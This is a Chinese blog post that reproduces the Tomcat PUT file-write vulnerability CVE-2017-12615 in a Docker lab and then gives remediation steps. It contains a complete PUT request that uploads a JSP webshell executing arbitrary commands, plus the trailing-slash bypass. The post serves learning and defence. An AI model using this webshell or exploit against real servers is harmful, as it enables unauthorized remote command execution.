漏洞复现-Tomcat PUT方法任意写文件漏洞(CVE-2017-12615)

原创 已于 2025-09-22 16:18:50 修改 · 842 阅读 · 26 ·
CC 4.0 BY-SA版权
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
文章标签:

#笔记

于 2025-06-07 10:44:39 首次发布

漏洞复现-Tomcat PUT 方法任意写文件漏洞(CVE-2017-12615)详细步骤**

CVE-2017-12615 漏洞的核心问题在于 Tomcat 的默认配置或管理员的自定义配置存在安全隐患,具体表现为允许通过 HTTP 的 PUT 方法直接上传文件,且未对上传路径和内容进行充分验证。以下是关键配置问题的详细分析:

1. 漏洞利用条件

  1. 目标环境
    • Tomcat 版本在 7.0.0 - 7.0.81 之间。
    • 配置了 readonly=falseDefaultServlet(默认情况下,conf/web.xmlDefaultServletreadonly 属性为 true,但可能被管理员修改)。
    • 目标目录(如 /WEB-INF//)可写。
  2. 攻击者权限
    • 无需认证(如果目标未启用认证)。
    • 需知道目标 Web 应用的上下文路径(如 /, /examples 或 自定义的/myupload,)。 测试发现manager目录是无法成功PUT webshell的

2. 漏洞复现

环境搭建使用docker,vulhub

运行临时容器,为使用数据卷做准备

docker run -it --rm -p 8080:8080 --ulimit nofile=65535:65535 cve-2017-12615-tomcat:latest

在这里插入图片描述
进入容器,查找需要创建数据卷的目录
在这里插入图片描述

创建正式实验容器,使用数据卷

docker run --name mytomcat -v Mytomcat:/usr/local/tomcat -p 8080:8080 --ulimit nofile=65535:65535 -d 1ec3155d2f2a

docker会帮我们自动创建数据卷Mytomcat
查看数据卷列表

docker volume ls

查看数据卷Mytomcat的具体位置,和内容

docker volume inspect Mytomcat

cd /var/lib/docker/volumes/Mytomcat/_data 可看到容器内的内容,并进行同步修改
在这里插入图片描述
查看漏洞需要的配置
web.xml 允许 PUT 方法

<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>  <!-- 允许写入 -->
    </init-param>
</servlet>

在这里插入图片描述

  • 构造 PUT 请求
    使用或 Burp Suite 发送 PUT 请求,上传 JSP WebShell。
PUT /8.jsp/ HTTP/1.1
Host: 192.168.253.138:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 301

shell
<%@ page import="java.util.*,java.io.*"%>
<%
  out.print("WebShell Running...");
  String cmd = request.getParameter("cmd");
  if (cmd != null) {
    out.print("<pre>" + new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next() + "</pre>");
  }
%>

注意,测试时先抓一个tomcat本身的包,再粘贴上面的请求,不然bp自动会转换http版本,就失败了
先刷新这个页面抓一下包、再粘贴PUT数据包

并且路径最后需要有/
成功上传 PUT /11.jsp/
失败 PUT /11.jsp
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
服务器看到webshell
在这里插入图片描述

examples目录可访问,也可以将webshell 2.jsp到该目录
在这里插入图片描述
在这里插入图片描述
服务器看到webshell
在这里插入图片描述
wireshark抓包流量情况
在这里插入图片描述
在这里插入图片描述
statistics->HTTP->Packet Counter
在这里插入图片描述

3. 漏洞修复建议

  1. 升级 Tomcat
    • 升级到 Tomcat 7.0.82 或更高版本。
  2. 修改 DefaultServlet 配置
    • conf/web.xml 中将 DefaultServletreadonly 属性设置为 true
      <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>true</param-value>  <!-- 确保为 true -->
    </init-param>
</servlet>
  3. 限制 PUT/MOVE 方法
    • 在防火墙或 Web 应用防火墙(WAF)中限制对 PUT/MOVE 方法的访问。
  4. 禁用目录列表
    • 确保 listings 属性为 false
      <init-param>
    <param-name>listings</param-name>
    <param-value>false</param-value>
</init-param>

若 listings=true,攻击者上传文件后,可通过目录列表查看文件是否存在,协助判断是否上传成功

4. 总结

  • 漏洞利用流程
    1. 确认目标版本和 readonly 配置。
    2. 通过 PUT 方法上传 JSP WebShell。
    3. 访问 WebShell 并执行命令。
  • 修复建议
    • 升级 Tomcat 或修改配置。
    • 限制 PUT/MOVE 方法访问。
  • 注意事项
    • 漏洞利用需目标配置允许 PUT 请求(readonly=false)。
    • 实际攻击中可能需结合其他漏洞(如信息泄露)获取目标信息。

通过以上步骤,可以完整复现 CVE-2017-12615 漏洞的利用过程,并采取相应措施进行修复。

补充
当 Tomcat 的 DefaultServlet 配置中 listings=true 时,若用户访问的目录下没有默认文件(如 index.html),Tomcat 会返回该目录下的所有文件列表。

listings为false时的效果

listings
false

在这里插入图片描述
在这里插入图片描述
listings为true时的效果

listings
true

在这里插入图片描述

Tomcat 通过 PUT 方法任意文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1658
CVE-2017-12615 对应的漏洞任意文件入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了权限(readonly=false),导致可以使用PUT方法上传任意文件
Tomcat PUT 方法任意文件漏洞CVE-2017-12615复现
weixin_47498728的博客
01-06 1352
tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。
Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_45653478的博客
05-02 2072
在Apache Tomcat服务器中,PUT方法通常用于上传文件。攻击者可以通过发送PUT请求,将恶意文件上传到服务器。当攻击者发送PUT请求时,Tomcat服务器会将请求中的数据入指定的文件。如果攻击者能够控制文件路径,那么他们可以将恶意文件任意位置,从而实现任意文件入。
CVE-2017-12615 Tomcat PUT方法任意文件漏洞复现
永远是少年
01-05 1262
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2017-12615 Tomcat PUT方法任意文件漏洞复现。 一、漏洞简介与环境搭建 二、漏洞复现实战
漏洞复现Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 1236
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
tomcat put方法任意文件漏洞复现CVE-2017-12615
qq_54658370的博客
07-19 815
一丶漏洞原理 Windows服务器下,将readonly参数设置为false时(默认设置为true),即可通过PUT方式创建一个JSP文件,并可以执行任意代码。Windows不允许空格作为文件名结尾,所以我们上传的末尾带空格的jsp文件,就会自动创建一个jsp文件,导致代码执行。影响版本:7.0.0~7.0.79 几种绕过Tomcat的检测方式 1.利用Windows NTFS特性,evil.jsp::$DATA等于生成一个evil.jsp的jsp文件 二丶漏洞环境 ...
CVE-2017-12615源码分析与漏洞复现(Tomcat 任意文件上传)
spinage的博客
06-11 2096
CVE-2017-12615是Apache Tomcat 7.0.0至7.0.81版本中的高危远程代码执行漏洞,当服务器配置readonly=false时,攻击者可利用HTTP PUT方法上传恶意JSP文件漏洞成因在于文件后缀校验缺失和系统路径规范化特性(如Windows文件名处理和Java路径规范化),可通过三种方式绕过:添加空格、NTFS数据流或路径分隔符。利用该漏洞可上传webshell实现RCE,影响CVSS评分8.1。官方在7.0.82版本中完全修复该漏洞复现过程包括搭建靶机环境、构造特殊请求
Tomcat PUT方法任意文件 CVE-2017-12615 漏洞复现
Senimo
07-30 901
Tomcat PUT方法任意文件 CVE-2017-12615 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞EXP五、参考链接 一、漏洞描述 在启用 HTTP PUT 的 Windows 上运行 Apache Tomcat 7.0.0 到 7.0.79 时(例如,通过将 Default 的只读初始化参数设置为 false),可以通过特制的请求将 JSP 文件上传到服务器。然后可以请求这个 JSP,并且它包含的任何代码都将由服务器执行。 二、漏洞影响 7.0.0 < A
CVE-2017-12615 Tomcat PUT方法任意文件漏洞
weixin_51387754的博客
01-04 2494
漏洞简介 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务
Tomcat文件上传漏洞复现 CVE-2017-12615
m0_62284238的博客
09-08 940
tomcat文件上传漏洞复现 CVE-2017-12615
学习笔记097——Ubuntu系统中如何通过service服务的方式启动 jar 包?
code__bee的博客
01-06 188
【代码】学习笔记097——Ubuntu系统中如何通过service服务的方式启动 jar 包?
ue c++ websocket 音频实时传输实战笔记
jacke121的专栏
01-02 149
ue c++ websocket 库实战笔记
QXlsx开发笔记(三):单元格边框合并,设置宽度、高度、边框样式等综合操作Demo
长沙红胖子Qt的技术博客
01-05 1082
QXlsx的单元格边框的操作,涉及宽度、高度、合并,结合边框样式,就能做出需要的表格框架了。
数据库学习笔记(十九)--C/C++调用MYSQL接口
羊小猪~~的博客
01-05 875
本文介绍了MySQL 8.0 C API开发的基本流程和关键接口。主要内容包括: 核心数据结构:MYSQL(连接句柄)、MYSQL_RES(结果集)、MYSQL_ROW(行数据)、MYSQL_FIELD(字段信息)等基本结构。 基本开发流程: 初始化连接(mysql_init) 设置连接选项(mysql_options) 建立连接(mysql_real_connect) 执行查询(mysql_query/mysql_real_query) 处理结果集(mysql_store_result/mysql_use
联考——言语理解与表达笔记(一)
2301_78114356的博客
01-03 343
解题思路:找重点(中心)1.直接确定重点-逻辑层面之关联词---内容层面之主题词2.间接确定重点-排除非重点学习重点内容:1.转折关联词及重点位置2.因果关联词及终点位置3.错误选项的特征。
第3天:基础入门-抓包&封包&协议&APP&小程序&PC应用&WEB应用|小迪安全笔记|网络安全|
weixin_45635831的博客
12-29 1082
笔记】从WeakEventManager派生的类都有什么,以及他们的作用
最新发布
HeBianGu的博客
01-07 453
从 WeakEventManager 派生的常见公开类及其作用,并给出使用要点。常用与数据绑定相关集合视图与导航命令系统Dispatcher 与应用生命周期说明使用要点。
PMP学习笔记--人员
u014755700的博客
01-04 134
确保团队成员和干系人接受适当的培训。团队绩效评价和团队成长评估。项目管理团队与项目团队。干系人影响力强度和太对。创建协作的项目团队环境。敏捷场景下的团队管理。干系人权力/利益矩阵。运用情商提升团队绩效。
硬件电路设计学习笔记4.MOS管
Ra的博客
01-04 299
若未考虑寄生二极管,会因它的导通增加整流损耗,降低电路效率。桥式电路(如 H 桥)中易引发 “直通短路”在 H 桥等双向驱动电路中,上下桥臂的 MOS 管寄生二极管方向若未匹配,可能出现“上下管寄生二极管同时导通” 的情况,直接将电源正负极短路(即 “直通”),导致电源烧毁。高频电路中产生开关损耗寄生二极管存在“反向恢复时间”(从导通转为截止的延迟),高频开关场景下,反向恢复时间过长会导致 MOS 管在开关过程中出现大电流尖峰,增加开关损耗、引发MOS 管过热,影响电路可靠性。mos管寄生电容存在的问题。
cve-2017-12615漏洞复现
06-28
cve-2017-12615漏洞是Apache Tomcat服务器中的一个远程代码执行漏洞。攻击者可以通过发送特定的HTTP请求来利用该漏洞,从而在服务器上执行任意代码。 要复现漏洞,需要满足以下条件: 1. 目标服务器上运行的是...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值